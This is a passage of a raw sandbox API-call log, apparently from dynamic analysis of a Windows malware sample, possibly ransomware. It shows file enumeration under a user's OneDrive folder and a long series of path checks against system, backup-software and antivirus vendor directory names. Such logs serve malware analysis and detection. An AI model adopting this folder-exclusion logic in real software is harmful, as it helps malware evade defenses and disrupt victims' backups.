FindNextFileW (in: hFindFile=0x2cfb58, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.432] FindNextFileW (in: hFindFile=0x2cfb58, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.432] FindClose (in: hFindFile=0x2cfb58 | out: hFindFile=0x2cfb58) returned 1 [0100.432] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.432] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfc18 [0100.433] FindNextFileW (in: hFindFile=0x2cfc18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.433] FindNextFileW (in: hFindFile=0x2cfc18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.433] FindNextFileW (in: hFindFile=0x2cfc18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.433] FindClose (in: hFindFile=0x2cfc18 | out: hFindFile=0x2cfc18) returned 1 [0100.433] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.433] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\id\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf998 [0100.434] FindNextFileW (in: hFindFile=0x2cf998, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.434] FindNextFileW (in: hFindFile=0x2cf998, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.434] FindNextFileW (in: hFindFile=0x2cf998, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.434] FindClose (in: hFindFile=0x2cf998 | out: hFindFile=0x2cf998) returned 1 [0100.434] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.434] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ig-ng\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfad8 [0100.435] FindNextFileW (in: hFindFile=0x2cfad8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.435] FindNextFileW (in: hFindFile=0x2cfad8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.435] FindNextFileW (in: hFindFile=0x2cfad8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.436] FindClose (in: hFindFile=0x2cfad8 | out: hFindFile=0x2cfad8) returned 1 [0100.436] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.436] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\imageformats\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfd98 [0100.436] FindNextFileW (in: hFindFile=0x2cfd98, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.437] FindNextFileW (in: hFindFile=0x2cfd98, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.444] CharUpperBuffW (in: lpsz=".svg", cchLength=0x4 | out: lpsz=".SVG") returned 0x4 [0100.444] CharUpperBuffW (in: lpsz="stackedIceCubes.svg", cchLength=0x13 | out: lpsz="STACKEDICECUBES.SVG") returned 0x13 [0100.444] CharUpperBuffW (in: lpsz=".svg", cchLength=0x4 | out: lpsz=".SVG") returned 0x4 [0100.444] CharUpperBuffW (in: lpsz="waterGlass.svg", cchLength=0xe | out: lpsz="WATERGLASS.SVG") returned 0xe [0100.445] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", cchLength=0x1e | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\DESKTOP\\") returned 0x1e [0100.445] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.445] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0100.445] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.445] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0100.445] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.445] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0100.445] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.445] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0100.445] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.445] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0100.445] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.445] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0100.445] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.445] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0100.445] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.445] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0100.445] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.445] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0100.445] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.445] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0100.445] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.445] CharUpperBuffW (in: lpsz="\\ACRONIS\\", cchLength=0x9 | out: lpsz="\\ACRONIS\\") returned 0x9 [0100.445] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.445] CharUpperBuffW (in: lpsz="\\BACKUPCLIENT\\", cchLength=0xe | out: lpsz="\\BACKUPCLIENT\\") returned 0xe [0100.445] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.445] CharUpperBuffW (in: lpsz="\\BACKUP MANAGER\\", cchLength=0x10 | out: lpsz="\\BACKUP MANAGER\\") returned 0x10 [0100.445] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.445] CharUpperBuffW (in: lpsz="\\CARBONITE\\", cchLength=0xb | out: lpsz="\\CARBONITE\\") returned 0xb [0100.445] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.445] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0100.446] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.446] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0100.446] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.446] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0100.446] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.446] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0100.446] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.446] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0100.446] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.446] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0100.446] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.446] CharUpperBuffW (in: lpsz="\\REFERENCE ASSEMBLIES\\", cchLength=0x16 | out: lpsz="\\REFERENCE ASSEMBLIES\\") returned 0x16 [0100.446] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.446] CharUpperBuffW (in: lpsz="\\MICROSOFT OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT OFFICE\\") returned 0x12 [0100.446] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.446] CharUpperBuffW (in: lpsz="\\WINDOWS SIDEBAR\\", cchLength=0x11 | out: lpsz="\\WINDOWS SIDEBAR\\") returned 0x11 [0100.446] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.446] CharUpperBuffW (in: lpsz="\\WINDOWS MEDIA PLAYER\\", cchLength=0x16 | out: lpsz="\\WINDOWS MEDIA PLAYER\\") returned 0x16 [0100.446] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.446] CharUpperBuffW (in: lpsz="\\MICROSOFT\\OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\OFFICE\\") returned 0x12 [0100.446] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.446] CharUpperBuffW (in: lpsz="\\MICROSOFT ONEDRIVE\\", cchLength=0x14 | out: lpsz="\\MICROSOFT ONEDRIVE\\") returned 0x14 [0100.446] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.447] CharUpperBuffW (in: lpsz="\\GOOGLE\\DRIVE\\", cchLength=0xe | out: lpsz="\\GOOGLE\\DRIVE\\") returned 0xe [0100.447] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.447] CharUpperBuffW (in: lpsz="\\DROPBOX\\", cchLength=0x9 | out: lpsz="\\DROPBOX\\") returned 0x9 [0100.447] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.447] CharUpperBuffW (in: lpsz="\\MICROSOFT\\PROVISIONING\\", cchLength=0x18 | out: lpsz="\\MICROSOFT\\PROVISIONING\\") returned 0x18 [0100.447] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.447] CharUpperBuffW (in: lpsz="\\MICROSOFT SILVERLIGHT\\", cchLength=0x17 | out: lpsz="\\MICROSOFT SILVERLIGHT\\") returned 0x17 [0100.447] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.447] CharUpperBuffW (in: lpsz="\\PROGRAMDATA\\MICROSOFT\\", cchLength=0x17 | out: lpsz="\\PROGRAMDATA\\MICROSOFT\\") returned 0x17 [0100.447] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.447] CharUpperBuffW (in: lpsz="\\MICROSOFT\\CRYPTO\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\CRYPTO\\") returned 0x12 [0100.447] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.447] CharUpperBuffW (in: lpsz="\\WINDOWSAPPS\\", cchLength=0xd | out: lpsz="\\WINDOWSAPPS\\") returned 0xd [0100.447] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.447] CharUpperBuffW (in: lpsz="\\ACROBAT READER", cchLength=0xf | out: lpsz="\\ACROBAT READER") returned 0xf [0100.447] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.447] CharUpperBuffW (in: lpsz="\\NVIDIA", cchLength=0x7 | out: lpsz="\\NVIDIA") returned 0x7 [0100.447] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.447] CharUpperBuffW (in: lpsz="\\7-ZIP\\", cchLength=0x7 | out: lpsz="\\7-ZIP\\") returned 0x7 [0100.447] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.447] CharUpperBuffW (in: lpsz="\\WINRAR\\", cchLength=0x8 | out: lpsz="\\WINRAR\\") returned 0x8 [0100.448] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.448] CharUpperBuffW (in: lpsz="\\ESET", cchLength=0x5 | out: lpsz="\\ESET") returned 0x5 [0100.448] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.448] CharUpperBuffW (in: lpsz="\\AVAST", cchLength=0x6 | out: lpsz="\\AVAST") returned 0x6 [0100.448] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.448] CharUpperBuffW (in: lpsz="\\MALWAREBYTES", cchLength=0xd | out: lpsz="\\MALWAREBYTES") returned 0xd [0100.448] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.448] CharUpperBuffW (in: lpsz="\\SYMANTEC ENDPOINT", cchLength=0x12 | out: lpsz="\\SYMANTEC ENDPOINT") returned 0x12 [0100.448] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.448] CharUpperBuffW (in: lpsz="\\TREND MICRO", cchLength=0xc | out: lpsz="\\TREND MICRO") returned 0xc [0100.448] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.448] CharUpperBuffW (in: lpsz="\\BITDEFENDER", cchLength=0xc | out: lpsz="\\BITDEFENDER") returned 0xc [0100.448] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.448] CharUpperBuffW (in: lpsz="\\PANDA SECURITY", cchLength=0xf | out: lpsz="\\PANDA SECURITY") returned 0xf [0100.448] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.448] CharUpperBuffW (in: lpsz="\\MCAFEE", cchLength=0x7 | out: lpsz="\\MCAFEE") returned 0x7 [0100.448] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.448] CharUpperBuffW (in: lpsz="\\KASPERSKY LAB", cchLength=0xe | out: lpsz="\\KASPERSKY LAB") returned 0xe [0100.448] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.448] CharUpperBuffW (in: lpsz="\\KASPERSKYLAB", cchLength=0xd | out: lpsz="\\KASPERSKYLAB") returned 0xd [0100.448] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.449] CharUpperBuffW (in: lpsz="\\AVDEFENDER", cchLength=0xb | out: lpsz="\\AVDEFENDER") returned 0xb [0100.449] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.449] CharUpperBuffW (in: lpsz="\\SOPHOS", cchLength=0x7 | out: lpsz="\\SOPHOS") returned 0x7 [0100.449] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.449] CharUpperBuffW (in: lpsz="\\AVG", cchLength=0x4 | out: lpsz="\\AVG") returned 0x4 [0100.449] CharUpperBuffW (in: 